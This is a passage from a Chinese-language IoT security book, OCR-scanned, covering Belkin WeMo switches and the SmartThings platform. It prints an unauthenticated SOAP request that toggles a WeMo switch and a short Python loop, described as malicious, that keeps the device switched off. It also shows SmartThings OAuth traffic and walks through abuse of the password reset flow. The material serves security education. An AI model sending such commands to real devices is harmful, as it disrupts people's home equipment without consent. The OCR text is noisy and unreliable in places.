«modelNumber»1.0«/modelNumber-» 


«modelURL»http://www.belkin.com/plugin/«/modelURL» 
«serialNumber» [DELETED] </serialNumber> 
<UPC>123456789</UPC> 
<macAddress> [DELETED] </macAddress> 
«firmwareVersion»WeMo US 2.00.2769.PVT«/firmwareVersion» 
«iconVersion»0|49153«/iconVersion» 
«binaryState»0«/binaryState» 
X«iconList» 
«icon» 
«mimetype»jpg«/mimetype» 
«width»100«/width» 
«height»100«/height» 
«depth»100«/depth» 
«url»icon.jpg«/url» 
«/icon» 
«/iconList» 
Xservicelist» 

«service» 
X«serviceType»urn:Belkin:service:WiFiSetup:l«/serviceType» 
XserviceId»urn:Belkin:serviceId:WiFiSetupl«/serviceId» 
«controlURL»/upnp/control/WiFiSetupl«/controlURL» 
«eventSubURL»/upnp/event/WiFiSetupl«/eventSubURL» 
«SCPDURL»/setupservice.xml«/SCPDURL» 

«/service» 

«service» 
XserviceType»urn:Belkin:service:timesync:l«/serviceType» 
«serviceId»urn:Belkin:serviceId:timesyncl«/serviceId» 
XcontrolURL»/upnp/control/timesyncl«/controlURL» 
«eventSubURL»/upnp/event/timesyncl«/eventSubURL» 
«SCPDURL»/timesyncservice.xml«/SCPDURL» 

«/service» 

«service» 
«serviceType»urn:Belkin:service:basicevent:1«/serviceType» 
X«serviceld»urn:Belkin:serviceId:basiceventl«/serviceld» 
«controlURL»/upnp/control/basiceventl«/controlURL» 
«eventSubURL»/upnp/event/basiceventl«/eventSubURL» 
«SCPDURL»/eventservice.xml«/SCPDURL» 

«/service» 

«service» 
X«serviceType»urn:Belkin:service:firmwareupdate:1«/serviceType» 
«serviceId»urn:Belkin:serviceId:firmwareupdatel«/serviceld» 
«controlURL»/upnp/control/firmwareupdatel«/controlURL» 
«eventSubURL»/upnp/event/firmwareupdatel«/eventSubURL» 
«SCPDURL»/firmwareupdate.xml«/SCPDURL» 

«/service» 

«service» 
XserviceType»urn:Belkin:service:rules:1«/serviceType» 
«serviceId»urn:Belkin:serviceId:rulesl«/serviceId» 
«controlURL»/upnp/control/rulesl«/controlURL» 
«eventSubURL»/upnp/event/rules1«/eventSubURL» 
«SCPDURL»/rulesservice.xml«/SCPDURL» 

«/service» 


«service» 
XserviceType»urn:Belkin:service:metainfo:1«/serviceType» 
X«serviceId»urn:Belkin:serviceId:metainfol«/serviceId» 
X«controlURL»/upnp/control/metainfol«/controlURL» 
«eventSubURL»/upnp/event/metainfol«/eventSubURL» 
«SCPDURL»/metainfoservice.xml«/SCPDURL» 

«/service» 


«service» 
X«serviceType»urn:Belkin:service:remoteaccess:1«/serviceType» 
«serviceId»urn:Belkin:serviceId:remoteaccessl«/serviceld» 
«controlURL»/upnp/control/remoteaccess1«/controlURL» 
«eventSubURL»/upnp/event/remoteaccess1«/eventSubURL» 
«SCPDURL»/remoteaccess.xml«/SCPDURL» 

«/service» 


«service» 
X«serviceType»urn:Belkin:service:deviceinfo:1«/serviceType» 
«serviceId»urn:Belkin:serviceId:deviceinfol«/serviceId» 
«controlURL»/upnp/control/deviceinfol«/controlURL» 
«eventSubURL»/upnp/event/deviceinfol«/eventSubURL» 
«SCPDURL»/deviceinfoservice.xml«/SCPDURL» 

«/service» 


«/serviceList» 
XpresentationURL»/pluginpres.html«/presentationURL» 
«/device» 
«/root» 


注意 remoteaccess1 服 务 。 它 的 启动 方式 与 WeMo Baby 例 子 中 使 用 的 方式 是 一 样 的 。 然 而 ， 还 有 另外 一 个 服务 一 一 basicevent1。 事 实 上 ， 当 用 户 与 智能 开关 在 同一 个 
WiFi 网 络 中 时 ， 用 户 可 能 就 是 连接 的 basicevent1 服 务 ， 并 向 智能 开关 发 送 切 换 命令 : 


POST /upnp/control/basiceventl HTTP/1.1 

SOAPACTION: "urn:Belkin:service:basicevent:1#SetBinaryState" 
Content-Length: 316 

Content-Type: text/xml; charset="utf-8" 

HOST: 10.0.1.8:49153 

User-Agent: CyberGarage-HTTP/1.0 


«?xml version-"1.0" encoding="utf-8"?> 
Xs:Envelope xmlns:s-"http://schemas.xmlsoap.org/soap/envelope/" 
s:encodingStyle-"http://schemas.xmlsoap.org/soap/encoding/"» 
«s:Body» 
«u:SetBinaryState xmlns:u-"urn:Belkin:service:basicevent:1"» 
«BinaryState»0«/BinaryState» 
«/u:SetBinaryState» 
«/s:Body» 
«/s:Envelope» 


BinaryState 字 段 的 值 被 置 为 0， 命 令 智 能 开关 切换 至 关闭 。 智 能 开关 给 出 如 下 响应 信息 : 


HTTP/1.1 200 OK 

CONTENT-LENGTH: 285 

CONTENT-TYPE: text/xml; charset="utf-8" 
DATE: Mon, 14 Oct 2013 10:58:26 GMT 

EXT: 

SERVER: Unspecified, UPnP/1.0, Unspecified 


X-User-Agent: redsonic 


Xs:Envelope xmlns:s-"http://schemas.xmlsoap.org/soap/envelope/" 
S:encodingStyle-"http://schemas.xmlsoap.org/soap/encoding/"»«s:Body» 
«u:SetBinaryStateResponse xmlns:u-"urn:Belkin:service:basicevent:1"» 
«BinaryState»0«/BinaryState» 

«/u:SetBinaryStateResponse» 

«/s:Body» «/s:Envelope» 


含有 0 值 的 Binarystate 字 段 确认 信息 的 HTTP OK 响应 ， 表 示 智 能 开关 成 功 关闭 了 连接 在 它 应 用 上 的 电源 。 


Isaac Kelly 使 用 Python 创建 了 一 个 概念 证 明 (proof-of-concept) 工具 包 ， 用 于 测试 本 地 访问 WeMo 智 能 开关 。 出 于 演示 的 目的 ， 我们 给 出 一 个 简单 的 恶意 脚本 的 例 
子 ,该 脚本 利用 了 lsaac Kelly 的 工具 包 框 架 ， 可 以 永久 关闭 插入 在 智能 开关 上 的 电子 设备 : 


#!/usr/bin/python 

import time 

from wemo import on, off, get 
while True: 


off() 
time.sleep(5 


在 我 的 YouTube 上 ， 能 看 到 该 攻击 方法 的 视频 演示 。 


注意 ， 这 里 没有 要 求 任何 认证 ， 也 没有 要 求 使 用 任何 授权 ! 现在 , 我们 有 了 充分 的 证 据 证 明 : 类 似 的 攻击 思路 使 用 在 WeMo Baby 和 WeMo 智 能 开关 这 类 产品 的 设计 中 。 
与 婴儿 监控 器 的 情况 类 似 ， 恶 意 软 件 开发 者 可 以 很 轻松 地 利用 安全 缺陷 ， 利 用 已 经 攻陷 的 计算 机 设备 ， 可 以 快速 地 切换 WeMo 智 能 开关 的 电源 。 


除了 本 地 访问 以 外 ， 应 用 程序 还 可 以 进行 远程 访问 ， 所 以 你 可 以 在 世界 各 地 切换 智能 开关 。 要 做 到 这 一 点 ， 应 用 程序 首先 要 向 remoteaccess1 服 务 发 送 一 个 与 WeMo 
Baby 设 备 类 似 的 请 求 。 在 调用 运行 于 智能 开关 本 地 web 服 务 器 上 的 remoteaccess1 服 务 时 ， 应 用 程序 会 发 送 一 个 用 户 定义 的 字符 串 作 为 设备 名 称 。 该 字符 串 会 被 作为 响应 传 
回 ， 并 保存 为 智能 开关 的 授权 令 牌 。 


当 用 户 位 于 远程 网 络 环境 中 时 ，DeviceName 值 会 被 发 往 https://api.xbcs.net:8443/apis/http/plugin/message， 然 后 再 转发 给 智能 开关 。 所 以 本 质 上 来 讲 ， 恶 意 代 码 
不 需 很 长 ， 一 小 段 就 够 了 ， 只 要 它 能 够 通过 连接 api.xbcs.net 服 务 获取 DeviceName 之 后 访问 本 地 WIiFi 网 络 一 次 ， 就 可 以 向 智能 开关 发 送 切 换 指令 了 。 


就 微软 的 产品 而 言 ， 道 德 安全 研究 人 员 和 犯罪 分 子 通过 查找 漏洞 并 测试 是 否 在 其 他 地 方 也 存在 相似 的 不 安全 设计 方法 ， 以 此 来 发 现 整个 产品 线 的 问题 所 在 。 对 于 WeMo 产 
品 线 来 讲 ， 我 们 能 够 看 到 问题 是 相似 的 。 我 们 已 经 知道 软件 安全 的 重要 性 ， 我 们 在 物 联网 产品 的 领域 中 也 再 现 了 这 样 问题 。 


34 人 小结 


家 长 和 监护 人 依赖 监控 技术 保护 家 人 的 安全 。 本 章 我 们 给 出 了 几 个 Foscam 设 备 的 例子 ， 从 中 看 到 ， 如 果 家 长 意识 到 小 孩 卧 室内 的 监控 设备 已 经 被 外 部 人 员 攻 陷 了 ， 他 们 
会 感到 多 么 的 不 安 。 从 婴儿 卧室 中 传 出 陌生 人 的 声音 并 不 是 每 个 家 长 都 想 经 历 的 。 除 了 会 导致 这 种 令 人 害怕 的 情况 之 外 ， 监 控 设 备 还 会 被 恶意 人 员 滥用 ， 致 使 可 在 远程 暗中 监 
视 成 人 之 间 的 对 话 ， 隐 私 泄露 无 疑 。 


对 于 WeMo 设 备 而 言 ， 很 明显 由 于 其 设计 上 的 缺陷 ， 导 致 存在 外 人 只 要 访问 本 地 网 络 一 次 ， 就 可 以 窥探 到 监控 设备 的 隐私 这 种 风险 。 我 们 还 看 到 ， 对 于 Foscam 设 备 而 
， 任 何人 使 用 类 似 于 Shodan 这 样 的 服务 ， 都 可 以 轻松 发 现成 干 上 万 的 物 联网 监控 设备 的 漏洞 。 


Tl 


我 们 已 经 知道 了 软件 安全 的 重要 性 所 在 ,实际 上 对 于 物 联网 设备 来 讲 ， 我 们 面临 的 安全 风险 也 是 很 严重 的 。 我 们 知道 了 不 要 相信 本 地 网 络 上 的 其 他 设备 ， 还 学 会 了 要 将 安 
全 进程 内 置 于 整个 开发 生命 周期 中 ， 只 有 这 样 ， 利 用 代码 中 的 bug 绕 过 认证 这 种 简单 的 攻击 方式 才 不 会 发 生 。 公 司 在 生产 类 似 于 婴儿 监控 器 这 样 的 设备 过 程 中 ， 必 须要 养 成 习 
惯 ， 从 一 开始 就 要 考虑 安全 性 ， 从 设计 安全 用 例 到 体系 结构 ， 再 到 确保 源 代码 安 全 ， 这 些 环节 都 要 进行 检验 ， 杜 绝 漏洞 生成 。 


监控 设备 ， 特 别 是 类 似 于 本 章 讨论 过 的 监控 设备 ， 必 须 允 许 安全 补丁 可 无 缝 衔接。 否则 的 话 ， 我 们 只 是 将 数 以 百 万 计 的 未 打 补 本 有 漏洞 的 设备 丢 到 互联 网 上 去 。 对 于 
Foscam 设 备 而 言 ， 打 个 关键 补丁 实在 是 太 繁 瑞 了， 几乎 没有 几 个 家 长 真 的 会 去 下 功夫 做 这 件 事 。 消 费 者 需要 的 是 厂商 提供 无 终 、 平 滑 的 更 新 过 程 。 


第 4 章 ”模糊 的 界限 一 一 当 物 理 空 间 遇 到 虚拟 空间 


Android 和 iOs 是 世界 上 最 流行 的 手机 操作 系统 。 除 了 很 多 其 他 用 途 外 ， 手 机 还 具有 地 图 功能 。 早 在 2007 年 第 一 代 苹 果 手机 发 布 时 ， 手 机 上 的 全 球 定位 系统 (GPS) 的 功 
能 仅仅 是 勉强 能 用 ， 许 多 人 能 使 用 Yahoo! Maps 或 是 MapQuest (雅虎 地 图 软件 ) 在 一 张 纸 上 打印 出 方向 。 仪 仅 几 年 之 后 ， 我 们 便 开 始 如 此 依赖 智能 手机 的 GPS 功能 ， 然 而 
现在 很 难 想象 在 过 去 我 们 依赖 什么 。 


现在 家 里 的 许多 工具 经 历 了 同样 的 变革 。 如 前 几 章 所 述 ， 我 们 正在 向 着 迅速 代 蔡 线 下 设备 的 方向 前 进 ， 如 传统 门 锁 ， 无 线 电 婴儿 监视 器 ， 以 及 有 着 物 联网 组 件 的 照明 设 
备 ， 这 些 设备 可 以 远程 访问 和 控制 。 在 短 短 几 年 内 ， 类 似 于 我 们 目前 依赖 智能 手机 中 的 GPS 功能 的 情况 ， 我 们 想 知 道 不 依赖 这 些 东西 ， 无 论 在 哪 我 们 都 能 和 家 中 的 各 种 物品 


(如 门 开关 传感器 、 温 度 控制 器 和 运动 检测 器 ) 联系 。 如 果 离 开 家 时 前 门 没有 上 锁 ， 这 个 事件 不 能 远程 告知 的 话 ， 这 似乎 让 人 难以 理解 。 


SmartThings (三 星 于 2014 年 发 布 ) 是 一 家 试图 引领 智能 互联 家 居 梦 想 的 公司 ， 具 有 一 系列 产品 ， 如 SmartSense Multi Sensor 和 SmartPower Outlet。SmartThings 商 
店 有 大 量 产品 ， 个 人 可 以 自行 购买 和 安装 。 


鉴于 SmartThings 公 司 专注 于 家 庭 物 联网 化 ， 本 章 重点 是 评估 其 产品 设计 的 安全 性 。 鉴 定 像 SmartThings 这 样 的 公司 并 分 析 正 在 他 们 产品 线 工 作 的 设计 原则 的 好 与 坏 是 重 
要 的 。 现 在 人 们 安装 和 使 用 这 样 的 设备 ， 相 应 的 安全 架构 必 会 开创 先例 ， 并 将 用 到 相似 产品 的 未 来 版 本 上 。 


这 些 产 品 许多 功能 当前 也 用 于 确保 物理 安全 一 一 例如 ， 一 栋 房 子 的 大 门 在 午夜 意外 打开 时 ， 一 条 警告 消息 会 发 送 到 房 主 的 智能 手机 上 。 因 此 ， 人 迫切 需要 我 们 去 评价 这 些 产 
品 当前 的 安全 状态 ， 以 便 我 们 能 够 学 会 如 何在 现在 和 未 来 确保 他 们 的 安全 。 


SmartThings 系 统 也 可 以 用 于 控制 第 三 方 开发 的 物 联网 产品 。 许 多 公司 都 试图 找 出 如 何 与 其 他 公司 制造 的 设备 互 用 ， 因 此 学 会 如 何 使 我 们 的 设备 与 其 他 设备 安全 地 工作 是 
重要 的 。 本 章 ， 我 们 将 从 安全 的 角度 看 待 智 能 物品 提供 的 互 用 性 。 


4.1 SmartThings 


本 节 ， 我 们 将 关注 以 下 几 个 部 分 : SmartSense Multi Sensor、SmartThings 应 用 程序 和 SmartThings Hub。 鉴 于 智能 家 居 (SmartThings) 平台 可 以 使 用 应 用 程序 进行 
编程 ， 我 们 将 通过 分 析 应 用 程序 的 设计 和 功能 来 测试 平台 的 安全 性 设计 。 


SmartSense Multi Sensor (如 图 4-1 所 示 ) 是 一 个 多 用 途 装置 ， 包 括 温度 传感器 、 加 速 计 和 用 于 探测 门 磁性 开 / 关 的 传感器 。 在 本 章 中， 我 们 关注 一 个 使 用 案例 ， 打 开 或 
关闭 特定 的 门 ， 使 用 smartsense Multi Sensor 来 触发 一 个 事件 。 


图 4-1: SmartSense Multi Sensor 


SmartThings Hub (如 图 4-2 所 示 ) 是 SmartThings 平 台 的 大 脑 。 它 连接 了 所 有 的 传感器 (包括 一 些 第 三 方 开发 的 设备 ) ， 人 允许 用 户 接收 由 传感器 输入 所 触发 的 事件 通 
知 。 集 线 器 也 连接 到 智能 家 居 云 基础 设施 ， 人 允许 用 户 在 传感器 接收 到 输入 信息 时 设计 具体 的 触发 事件 。 


SmartThings Hub 使 用 ZigBee 协 议 连接 附近 的 设备 。 本 章 的 重点 是 通过 分 析 智 能 家 居 应 用 程序 和 开发 环境 来 评估 设计 的 安全 性 。 请 参见 第 1 章 ， 了 解 如 何 获取 和 分 析 


ZigBee 数 据 。 


图 4-2: SmartThings Hub 


SmartThings 应 用 程序 用 于 识别 智能 家 居 设 备 并 检查 它们 的 状态 。 在 图 4-3 中 ， 应 用 程序 显示 SmartPower Outlet 处 于 启用 状态 ， 并 且 连 接 门 的 SmartSense Multi 
Sensor 处 于 关闭 状态 。 


用 户 必须 注册 一 个 智能 家 居 账 户 ， 从 图 4-4 所 示 的 界面 登录 。 


当 用 户 输入 他 的 赁 证 并 按 下 登录 键 时 ， 应 用 程序 发 送 以 下 信息 : 


POST /oauth/token HTTP/1.1 

Host: graph.api.smartthings.com 

Accept: application/json 

Proxy-Connection: keep-alive 

X-ST-Client-DeviceModel: iPhone 

X-ST-Api-Version: 2.1 

Accept-Encoding: gzip, deflate 

Accept-Language: en;q-1 

X-ST-Client-AppVersion: 1.6.5 

Content-Type: application/x-www-form-urlencoded; charset-utf-8 
Content-Length: 191 

User-Agent: SmartThings/1006 (iPhone; iOS 8.0.2; Scale/2.00) 
X-ST-Client-OS: iOS 8.0.2 

Connection: keep-alive 


client id-[DELETED]&client secret-[DELETED]O&grant type-password& 
password-skeuomorphism&scope-mobile&username-scott.forstall8apple.com 
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图 4-3: SmartThings iOS 应 用 程序 
SS. 正如 预期 的 那样 ， 用 户 名 和 


应 用 程序 遵循 OAuth 标 准 提交 凭据 和 获取 授权 。 通 常 应 用 程序 提交 的 client id 和 client_secret 值 总 是 相同 的 ， 这 样 就 可 以 认为 它 是 公共 人 
密码 字段 的 组 合 必须 正确 。 一 旦 用 户 提 交 了 正确 的 凭证 ，graph.api.smartthings.com 服 务 器 将 通过 以 下 方式 响应 : 


Email 


Password 


Forgot your password? 


Need an account? 


图 4-4: SmartThings 应 用 程序 登录 界面 


HTTP/1.1 200 OK 


Cache-Control: no-store 


Content-Type: application/json 
Date: Fri, 17 Oct 2014 04:46:45 GMT 


Server: Apache-Coyote/l.1 
Vary: Accept-Encoding 
Content-Length: 135 
Connection: keep-alive 


( 


"access token": 


" [DELETED] ", 


"expires in": 1576799999, 


"scope": "mobile", 
"token type": "bearer" 
} 
这 里 要 注意 的 是 : 重要 的 口令 是 access_token， 应 用 程序 使 用 它 来 确认 graph.api.smartthings.com 服 务 器 已 经 授权 。 无 论 是 谁 ， 只 要 知道 这 个 口令 就 能 直接 登录 


到 graph.api.smartthings.com 服 务 器 ， 模 拟 用 户 行为 。 值 得 注意 的 是 ，expires_in 的 单位 是 秒 ， 因 此 这 个 值 关联 到 18250 天 。 换 句 话说 ，access_token 值 是 有 效 的 ,将 
被 graph.api.smartthings.com 接 收 18250 天 ， 过 了 有 效 期 之 后 ， 用 户 需 要 重新 登录 。 


SmartThings 应 用 程序 允许 用 户 指定 多 个 物理 位 置 ， 例 如 在 家 、 办 公 室 ， 并 在 这 些 地 方 对 智能 家 居 设 备 进行 管理 。 


增加 其 他 位 置 的 功能 。 


图 4-5 的 应 用 程序 界面 列 出 了 当前 位 置 (在 家 ) 具备 可 


功 。 


+ Add Location 


图 4-5: 在 智能 家 居 应 用 界面 查看 和 添加 位 置 


要 获取 与 用 户 相关 的 位 置 清单 ， 该 应 用 程序 发 送 以 下 请 求 : 


GET /api/locations HTTP/1.1 
Host: graph.api.smartthings.com 
Accept: application/json 
Authorization: Bearer [DELETED] 
Proxy-Connection: keep-alive 
X-ST-Client-DeviceModel: iPhone 
X-ST-Api-Version: 2.1 
Accept-Encoding: gzip, deflate 
Accept-Language: en;q-1 
X-ST-Client-AppVersion: 1.6.5 
X-ST-Api-Key: [DELETED] 
X-ST-Client-OS: iOS 8.0.2 
User-Agent: SmartThings/1006 (iPhone; iOS 8.0.2; Scale/2.00) 
Connection: keep-alive 


X-ST-Api-Key 口 令 是 常数 ， 这 是 众所周知 的 。 提 交 给 Authorization 的 值 是 access token 值 ， 应 用 程序 接收 到 access_token 值 后 认证 成 
graph.api.smartthings.com 服 务 器 的 响应 如 下 所 示 : 


HTTP/1.1 200 OK 

Content-Type: application/json;charset=utf-8 
Date: Fri, 17 Oct 2014 04:46:47 GMT 

Server: Apache-Coyote/1.1 

Vary: Accept-Encoding 

X-Pad: avoid browser bug 

Content-Length: 1204 

Connection: keep-alive 


[("id":" [DELETED] ", "name" : "Home", "accountIG" : " [DELETED] ", "latitude" :42.613706, 
"longitude" :-120.200028, "regionRadius":150, "backgroundImage": 
"https://smartthings-location-images.s3.amazonaws.com/standard/standard62.jpg", 


"mode": ("id":" [DELETED] , "name" : "Away", "locationId" :" [DELETED] ") , "modes": 
[{"id":" [DELETED] " , "name" : "Away", "LocationId":" [DELETED]"] , ("id":" 

[DELETED] ", "name" : "Home", "locationId" :" [DELETED] "}, ("id":" [DELETED] ", "name": 
"Night","locationIl " [DELETED] ")], "role":"owner", "helloHomeAppId":" [DELETED] ", 
"temperatureScale":"F","hubs": [("id":" [DELETED] ", "name" : "Home", "ocationId": 
"[DELETED] ", " fármwareVersion":"000.010.00246", "zigbeeId":" [DELETED] ", "status": 
"ACTIVE", "onlineSince":"2014-10-08T18:42:52.6792","signalStrength":null, 
"batteryLevel":null, "type": ("name":"Hub"], "virtual":false, "role":"owner", 
"firmwareUpdateAvailable":false])])] 


根据 响应 ， 用 户 的 位 置 与 该 用 户 的 账户 相关 联 。 由 id 令 牌 的 值 标识 。latitude 和 longitude 值 表示 实际 物理 位 置 。 还 有 几 种 模式 ， 如 Away 和 Home。 用 户 能 够 手动 设置 当 
前 的 模式 ，SmartThings 系 统 也 可 以 自动 配置 ， 如 当 用 户 的 手机 位 于 regionRadius 之 外 设置 成 Away 状态 。 


SmartThings 应 用 程序 现在 需要 关于 智能 家 居 设 备 相关 的 账户 和 配置 的 额外 信息 。 使 用 早期 获得 的 位 置 id 和 access_ token (用 于 Authorization) 发 出 以 下 POST 请 求 : 


GET /api/locations/[DELETED]/smartapps/ HTTP/1.1 
Host: graph.api.smartthings.com 

Accept: application/json 

Authorization: Bearer [DELETED] 
Proxy-Connection: keep-alive 
X-ST-Client-DeviceModel: iPhone 
X-ST-Api-Version: 2.1 

Accept-Encoding: gzip, deflate 

Accept-Language: en;q-1 

X-ST-Client-AppVersion: 1.6.5 

X-ST-Api-Key: [DELETED] 

X-ST-Client-OS: iOS 8.0.2 

User-Agent: SmartThings/1006 (iPhone; iOS 8.0.2; Scale/2.00) 
Connection: keep-alive 


服务 器 响应 如 下 : 


HTTP/1.1 200 OK 

Content-Type: application/json;charset-utf-8 
Date: Fri, 17 Oct 2014 04:46:49 GMT 

Server: Apache-Coyote/1.1 

Vary: Accept-Encoding 

X-Pad: avoid browser bug 

Connection: keep-alive 

Content-Length: 18488 


[{"id":" [DELETED] ", "label":"Intruder alert","smartAppVersion":("id":"[DELETED]" 
,"version":0.9,"state":"SELF APPROVED","name":"Smart Security", "description": 
"Alerts you when there are intruders but not when you just got up for a glass 
of water in the middle of the night","iconUrl":" 

https: //s3.amazonaws .com/smartapp-icons/SafetyAndSecurity/App-IsItSafe.png", 
"iconX2Url": 
"https://s3.amazonaws .com/smartapp-icons/SafetyAndSecurity/App-IsItSafeQ2x.png", 
"dateCreated":"2013-05-29T711:58:022", "lastUpdated":"2014-05-14T21:55:472", 
"preferences": ("sections":[("input": [("title": [DELETED] ] , "hideable":false, 
"hidden":false, mobileOnly":true]], "defaults":true], "legacy" :true, "pageCount": 
0, "installedCount":1420, "author":"SmartThings", "photoUrls":[], "videoUrls":[], 
"showModuleWithoutChildren":false,"smartApp": ("id":" [DELETED] ")), 
"installedSmartAppParentIG":null, settings": ("textMessage":"Intruder alert!", 
"intrusionMotions":[],"alarms":[],"intrusionContacts": [" [DELETED] , "silent": 
"Yes", "newMode" : "", " residentMotions":[], "residentsQuietThreshold":"0", "phone": 
"4151111111","lights":[], "seconds" :"0") 


注意 定制 Intrudor alert， 每 当 有 人 打开 门 (由 安装 的 SmartThings Multi Sensor 检 测 到 ) ， 使 用 文本 信息 到 用 户 手机 (这 里 以 手机 号 4151111111 为 例 ) 发 送 警告 信息 。 
图 4-6 显 示 了 应 用 程序 的 用 户 界面 。 


8:35 PM 


Intruder alert 


Send this message 


Intruder alert! 


To this phone 
4151111111 


Time in minutes 


0 


Assign a name 


Intruder alert 


图 4-6: SmartThings 应 用 程序 配置 “Intruder alert" 


设置 好 自 定义 配置 ，SmartThings 应 用 程序 会 在 每 次 打开 门 时 发 送 短 信 到 4151111111。 图 4-7 显 示 的 是 当 定制 信息 被 触发 时 ， 用 户 接收 到 的 文本 信息 ( "Intruder 
alert! " ) 。 


家 庭 将 不 得 不 布置 产品 并 依赖 它 在 物理 入 侵 的 情况 下 发 送 警报 ， 不 难 想象 这 种 信息 可 信 的 数量 。 因 此 ， 重 要 的 是 ， 像 SmartThings 这 样 的 公司 ， 在 他 们 产品 的 设计 和 功能 
中 构建 安全 体系 。 在 接 下 来 的 部 分 ， 我 们 将 看 到 SmartThings 的 客户 处 于 风险 之 中 的 情景 ， 以 及 这 些 问 题 如 何 得 到 缓解 。 
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< Messages 512-69 Details 


Text Message 


Thursday 


Intruder alert! 


图 4-7: 当 门 被 打开 时 ， 警 告 用 户 的 文本 信息 
4.1.1 入 侵 凭证 
正如 我 们 所 看 到 的 ，SmartThings 应 用 程序 存储 了 用 户 的 设置 和 自 定义 内 容 ， 外 部 基础 设施 可 以 从 网 站 graph.api.smartthings.com 上 获得 。 这 使 得 恶意 实体 通过 窃取 或 


猜测 用 户 的 密码 来 控制 用 户 的 SmartThings 设 备 成 为 可 能 。 恶 意 实体 一 旦 成 功 地 做 到 这 一 点 ， 便 可 打开 或 关闭 连接 到 SmartPower Outlet 的 家 电 ， 或 是 禁止 进行 与 
SmartSense Multi Sensor 相 关联 的 用 户 定制 。 


如 图 4-8 所 示 ， 应 用 程序 密码 至 少 需要 8 位 字符 长 度 ， 至 少 包含 一 个 数字 和 一 个 字母 。 
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cbarnes(obagg.com 


cbarnes(obagg.com 


Create Account 
Already have an account? 


By signing up, you agree to the 
Terms of Service & Privacy Policy 


图 4-8: SmartThings 应 用 程序 密码 要 求 


很 明显 ，SmartThings 的 设计 者 通过 密码 复杂 性 要 求 来 构建 安全 体系 。 复 杂 的 密码 减缓 了 攻击 者 的 进攻 ， 那 些 攻击 者 需要 尽量 猜测 各 种 可 能 的 密码 组 合 。 


忘记 密码 的 用 户 可 以 申请 一 个 新 密码 ， 如 图 4-9 所 示 。 
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Send Recovery En 


em. Re EE qq. [pq 


AS js EX RS CO. HEB Ug BS IE 


^1.1 aa |! |. G 


space @ 


图 4-9: 使 用 SmartThings 应 用 程序 提交 密码 重 置 请 求 


当 用 户 按 下 发 送 找 回 密码 邮件 按钮 ， 应 用 程序 将 邮件 发 送 到 指定 地 址 ， 如 图 4-10 所 示 。 
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Password Reset for SmartThings 


You (or someone pretending to be you) requested that your password be reset. 


If you didn't make the request, then ignore this email, as no changes have been made. 


If you did make the request, then click here to reset your password. 


Thanks, 
The SmartThings Team 


图 4-10: 来 自 SmattThings 允 许 密码 重 置 的 邮件 


“点 击 这 里 重 置 你 的 密码 ” (cilck here to reset your possword) 链接 如 下 : 


http://mandrillapp.com/track/click/30028387/graph.api.smartthings.com 
?p-sdf9234msafd0234ASFASDf234023042342masdf0234SDAFSDF0234msdf0asfdsd 
£02342msad 


当 用 户 点 击 此 链接 时 ， 浏 览 器 会 被 


und 


定向 到 SmartThings 网 站 ， 链 接 如 下 所 示 : 


https://graph.api.smartthings.com/register/resetPassword?t-2304ksdf0As 
dfa3sdfd4asfasdf 


重 定向 后 ， 人 允许 用 户 选择 一 个 新 的 密码 ， 如 图 4-11 所 示 。 


i$ graph.api.smartthings.com/register/resetPassword 


Reset Password 
Enter your new password 


Password 


Password (againi 


Update my passworc 


图 4-11: 用 户 选择 一 个 新 的 密码 作为 密码 恢复 过 程 的 一 部 分 
有 几 个 关于 SmartThings 身 份 认 证 和 授权 的 系统 安全 问题 。 
单 因素 认证 
保护 系统 免 受 物理 威胁 不 应 当 依赖 于 单 因 素 认 证 。SmartThings 推 销 它 的 产品 具有 保护 和 监控 家 庭 的 能 力作 为 主要 特征 。 尽 管 该 系统 已 经 实现 了 一 个 复杂 密码 要 求 ， 但 是 


一 次 性 访问 用 户 的 电子 邮件 账户 会 削弱 该 系统 承诺 的 物理 安全 。 任 何 用户 名 和 密码 之 外 的 保护 措施 对 于 Pizza Hut 的 账户 来 说， 都 可 能 是 过 保护 ， 因 为 额外 的 保护 方法 的 花费 
比 收 恶 的 比萨 饼 订 购 活动 引起 的 花费 要 高 。 但 是 你 依赖 系统 来 保护 你 的 家 庭 和 所 爱 的 人 ， 就 必须 提供 更 大 的 安全 。 


在 当前 情况 下 ， 恶 意 实体 可 以 使 用 密码 重 设 功能 (如 图 4-9 所 示 ) 重 置 受害 人 的 SmartThings 密 码 。 所 有 攻击 者 需要 临时 访问 目标 的 电子 邮件 账户 ， 可 以 通过 窃取 属于 


SmartThings 用 户 的 移动 设备 来 获得 。 然 后 ， 攻 击 者 可 以 仅 通过 使 用 在 用 户 移动 设备 上 预先 配置 的 电子 邮件 客户 端 ， 就 可 以 重新 设置 密码 (如 图 4-11 所 示 ) 。 即 使 没有 移动 设 
备 的 物理 访问 权限 ， 攻 击 者 仍然 可 以 通过 发 动 网 络 钓鱼 攻击 ， 或 成 功 感染 受害 者 的 电脑 或 手机 ， 用 恶意 软件 捕获 电子 邮件 凭据 来 获得 电子 邮件 账户 的 访问 权限 。 


这 里 的 间 题 是， 产品 宣传 的 物理 安全 应 该 采取 安全 措施 并 实施 严格 的 控制 。 成 干 上 万 的 人 不 得 不 忍受 每 周 邮件 证 书 受到 入 侵 的 事实 。 用 户 本 不 应 该 担心 入 侵 者 能 够 远程 监 
视 和 影响 自己 家 中 的 设备 ， 仅 仪 是 因为 他 们 沦 为 一 个 简单 的 网 络 钓 鱼 攻击 的 受害 者 。 


像 谷歌 和 苹果 公司 这 样 的 公司 已 经 意识 到 ， 仪 仅 依靠 用 户 名 和 密码 机 制 已 经 越 来 越 难保 障 客户 的 安全 。 谷 歌 提供 了 双 因 素 认证 ， 同 时 需要 使 用 密码 (第 一 个 因素 ) 和 附加 
移动 设备 认证 (第 二 个 因素 ) 。 


启用 双 因 素 认 证 ， 用 户 必须 先进 入 他 的 证 书 ， 然 后 随机 产生 代码 ， 它 以 短信 的 形式 发 送 到 用 户 的 手机 。 用 户 登录 账户 时 必须 同时 输入 这 个 代码 。 这 种 设置 类 型 需要 了 解 一 
些 秘密 的 东西 (密码) ， 也 要 拥有 一 个 物理 设备 (移动 设备 ) 。 


苹果 公司 已 经 实施 了 类 似 的 方法 保护 用 户 ， 并 且 还 针对 第 三 方 应 用 开发 人 员 开 放 了 Touch1D 系 统 。 这 个 系统 能 够 很 容易 被 SmartThings 应 用 调用 来 验证 用 户 的 指纹 ， 作 为 
认证 的 第 二 因素 。 


另 一 个 值得 关注 的 问题 是 : 前 面 讨论 过 的 access token 的 寿命 (18250 天 ! ) 。18250 天 相当 于 50 年 ， 洪 在 的 攻击 者 有 50 年 的 时 间 尝 试 获取 access_ token， 再 利用 它 来 启 
动 graph.api.smartthings.com 服 务 命令 。 


